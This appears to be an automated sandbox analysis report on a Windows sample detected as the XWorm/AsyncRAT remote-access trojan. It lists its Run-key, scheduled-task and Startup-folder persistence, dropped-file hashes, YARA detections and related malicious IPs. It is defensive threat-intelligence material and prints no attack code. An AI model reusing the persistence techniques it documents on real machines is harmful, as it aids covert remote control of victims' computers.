                    Report type: full
                    Cookbook file name: default.jbs
                    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of new started processes analysed: 22
                    Number of new started drivers analysed: 0
                    Number of existing processes analysed: 0
                    Number of existing drivers analysed: 0
                    Number of injected processes analysed: 0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode: default
                    Analysis stop reason: Timeout
                    Sample name: YPzNsfg4nR.exe (renamed because the original name is a hash value)
                    Original Sample Name: 691c8281d68680d1f8966d657bfbcf4d100c7a70d6894493946793cc320623a6.exe
                    Detection: MAL
                    Classification: mal100.troj.evad.winEXE@24/28@2/3
                    EGA Information:
                    • Successful, ratio: 12.5%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 86
                    • Number of non-executed functions: 5
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                    • Excluded IPs from analysis (whitelisted): 40.126.32.134, 40.126.32.138, 40.126.32.140, 40.126.32.76, 40.126.32.136, 20.190.160.14, 20.190.160.22, 40.126.32.72, 23.56.254.164, 13.107.246.45, 52.149.20.212, 23.1.237.91
                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                    • Execution Graph export aborted for target YPzNsfg4nR.exe, PID 7332 because it is empty
                                                                    • Execution Graph export aborted for target coding, PID 5384 because it is empty
                                                                    • Execution Graph export aborted for target coding, PID 8084 because it is empty
                                                                    • Execution Graph export aborted for target powershell.exe, PID 2504 because it is empty
                                                                    • Execution Graph export aborted for target powershell.exe, PID 4308 because it is empty
                                                                    • Execution Graph export aborted for target powershell.exe, PID 7704 because it is empty
                                                                    • Execution Graph export aborted for target powershell.exe, PID 8008 because it is empty
• Not all processes were analyzed; report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
00:00:19 | API Interceptor | 1x Sleep call for process: YPzNsfg4nR.exe modified
00:00:28 | API Interceptor | 62x Sleep call for process: powershell.exe modified
00:01:27 | API Interceptor | 76x Sleep call for process: 24572628.exe modified
00:01:37 | API Interceptor | 2x Sleep call for process: OpenWith.exe modified
00:01:38 | API Interceptor | 2x Sleep call for process: svchost.exe modified
06:01:28 | Task Scheduler | Run new task: coding path: C:\ProgramData\coding
06:01:28 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run coding C:\ProgramData\coding
06:01:36 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run coding C:\ProgramData\coding
06:01:45 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coding.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | SAL987656700.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Resource.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | P3A946MOFP.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | BootstrapperV1.16.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | SharkHack.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | paint.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | X9g8L63QGs.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | KpHYfxnJs6.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | 9g9LZNE4bH.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | riFSkYVMKB.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
147.185.221.21 | Nurcraft.exe | malicious | XWorm |
147.185.221.21 | Zvas34nq1T.exe | malicious | XWorm |
147.185.221.21 | aoKTzGQSRP.exe | malicious | XWorm |
147.185.221.21 | SecuriteInfo.com.Trojan.DownLoad4.16832.13675.15683.exe | malicious | SheetRat |
147.185.221.21 | mIURiU8n2P.exe | malicious | XWorm |
147.185.221.21 | PixpFUv4G7.exe | malicious | Quasar, XWorm |
147.185.221.21 | r4RF3TX5Mi.exe | malicious | XWorm |
147.185.221.21 | ra66DSpa.exe | malicious | XWorm |
147.185.221.21 | Q5N7WOpk8J.bat | malicious | Unknown |
147.185.221.21 | NzEsfIiAc0.exe | malicious | XWorm |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | SAL987656700.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | Resource.exe | malicious | Blank Grabber | 208.95.112.1
ip-api.com | P3A946MOFP.exe | malicious | XWorm | 208.95.112.1
ip-api.com | BootstrapperV1.16.exe | malicious | XWorm | 208.95.112.1
ip-api.com | SharkHack.exe | malicious | XWorm | 208.95.112.1
ip-api.com | paint.exe | malicious | Blank Grabber | 208.95.112.1
ip-api.com | X9g8L63QGs.exe | malicious | Blank Grabber | 208.95.112.1
ip-api.com | KpHYfxnJs6.exe | malicious | Blank Grabber | 208.95.112.1
ip-api.com | 9g9LZNE4bH.exe | malicious | Blank Grabber | 208.95.112.1
ip-api.com | riFSkYVMKB.exe | malicious | Blank Grabber | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TUT-AS | SAL987656700.exe | malicious | AgentTesla | 208.95.112.1
TUT-AS | Resource.exe | malicious | Blank Grabber | 208.95.112.1
TUT-AS | P3A946MOFP.exe | malicious | XWorm | 208.95.112.1
TUT-AS | BootstrapperV1.16.exe | malicious | XWorm | 208.95.112.1
TUT-AS | SharkHack.exe | malicious | XWorm | 208.95.112.1
TUT-AS | paint.exe | malicious | Blank Grabber | 208.95.112.1
TUT-AS | X9g8L63QGs.exe | malicious | Blank Grabber | 208.95.112.1
TUT-AS | KpHYfxnJs6.exe | malicious | Blank Grabber | 208.95.112.1
TUT-AS | 9g9LZNE4bH.exe | malicious | Blank Grabber | 208.95.112.1
TUT-AS | riFSkYVMKB.exe | malicious | Blank Grabber | 208.95.112.1
SALSGIVER | sela.exe | malicious | Njrat | 147.185.221.17
SALSGIVER | P3A946MOFP.exe | malicious | XWorm | 147.185.221.24
SALSGIVER | BootstrapperV1.16.exe | malicious | XWorm | 147.185.221.24
SALSGIVER | SharkHack.exe | malicious | XWorm | 147.185.221.24
SALSGIVER | avaydna.exe | malicious | Njrat | 147.185.221.24
SALSGIVER | ddos tool.exe | malicious | XWorm | 147.185.221.24
SALSGIVER | L988Ph5sKX.exe | malicious | XWorm | 147.185.221.24
SALSGIVER | ANuh30XoVu.exe | malicious | XWorm | 147.185.221.24
SALSGIVER | p59UXHJRX3.exe | malicious | XenoRAT | 147.185.221.24
SALSGIVER | JdYlp3ChrS.exe | malicious | Njrat | 147.185.221.24
                                                                                        No context
                                                                                        No context
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.8306986570839627
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugP:gJjJGtpTq2yv1AuNZRY3diu8iBVqFl
                                                                                        MD5:8ABC3C15385F6D906DDA7E590F452109
                                                                                        SHA1:7D117E7F8DBBD2F633DF41AF8A76254C89FDBC97
                                                                                        SHA-256:5D48FBCA13BD6C0EB4DB736FEB84BF82AA72B9F1DBB5E4CBA8607CCD6679DDCD
                                                                                        SHA-512:826826CAB53E2AD15FE0FFC328CDC319483F7E15D7DB20B6FCAE13DD96B2818AC42F9762BA7CB065BB5C7828017FAFE6FAB0CEDA6094136E3A8F186034BC92F4
                                                                                        Malicious:false
Preview: (binary data; readable embedded strings: C:\ProgramData\Microsoft\Network\Downloader\ and C:\ProgramData\Microsoft\Network\Downloader\qmgr.db)
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf50580ab, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.6585129248590262
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:RSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Raza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                        MD5:87F796CC76262B0391D1D761DC2D7679
                                                                                        SHA1:D8D62E8BBCFCF6CB68E479F0AD9F32A5E4DBF10E
                                                                                        SHA-256:CF50BC048AFA31C6F52099E7F92439771513C9A1408EA724CD7CF41F059D36D7
                                                                                        SHA-512:7EE62067622F93E808E02202CB55BC7F79D0EFB7D7804788D404718B744C13CC38C9E1575CC972CB7CF1E30CDAAF6B9111605468C5759AA65995FCA7AABC87F4
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16384
                                                                                        Entropy (8bit):0.0811685372172786
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H4tlKYe0MqmkbGuAJkhvekl1ogiqz/l/ollrekGltll/SPj:YKzB7GrxlCnelAJe3l
                                                                                        MD5:3D64F21AF3E3AA040948D0375FFC3321
                                                                                        SHA1:5648097E4332C01A777334E4F22259F937019034
                                                                                        SHA-256:DAC8A750286465C2A4D10BDB8E434D4CB92F18A0F5203803DC1991AD7050CAF9
                                                                                        SHA-512:EC59FFACD5B3D75E8B308699D34DADD7DCF07E61D599ABB038EF02A8F29B6292C301B9916BCAF069F0DD59809D3307D53D32DB25FAFF27187588C2E7C6A64B8D
                                                                                        Malicious:false
                                                                                        Process:C:\Users\user\Desktop\24572628.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):75776
                                                                                        Entropy (8bit):5.94947504067525
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:z1fsaWa6B6zIJgfxtrjSvbqpU+CgEEL6DQrGR8mOOrxkajucVB:RfsaWajIJi6bq2lEprGiONkaju+B
                                                                                        MD5:FFD51738DC3483954A7BCDFAF713DB10
                                                                                        SHA1:3B643A4AD443A5EF249B1C02D0CDB927F5AE38E6
                                                                                        SHA-256:6A2BDC82837DA65C36AF89091F9B1282AE735DED04985BA44759466E4F47C394
                                                                                        SHA-512:67B5AC3FDB9C771F13603D9D78461751172A71EB6B236A55A7BA9C51D96B98C79A615D13F677317189007BA24F452B1B53B31356ACB25913BCEEA6313D84D452
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\coding, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\coding, Author: Joe Security
                                                                                        • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\ProgramData\coding, Author: Sekoia.io
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\coding, Author: ditekSHen
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 92%
Preview: (PE32 .NET executable; MZ/PE headers with sections .text, .rsrc and .reloc)
                                                                                        Process:C:\Users\user\Desktop\YPzNsfg4nR.exe
                                                                                        File Type:CSV text
                                                                                        Category:dropped
                                                                                        Size (bytes):425
                                                                                        Entropy (8bit):5.357964438493834
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                                                                                        MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                                                                                        SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                                                                                        SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                                                                                        SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                                                                                        Malicious:true
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..
                                                                                        Process:C:\ProgramData\coding
                                                                                        File Type:CSV text
                                                                                        Category:dropped
                                                                                        Size (bytes):654
                                                                                        Entropy (8bit):5.380476433908377
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                        Malicious:false
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:modified
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):0.34726597513537405
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlll:Nll
                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                        Malicious:false
                                                                                        Preview:@...e...........................................................
                                                                                        Process:C:\Users\user\Desktop\24572628.exe
                                                                                        File Type:Generic INItialization configuration [WIN]
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):3.6722687970803873
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                                                                        MD5:DE63D53293EBACE29F3F54832D739D40
                                                                                        SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                                                                        SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                                                                        SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                                                                        Malicious:false
                                                                                        Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
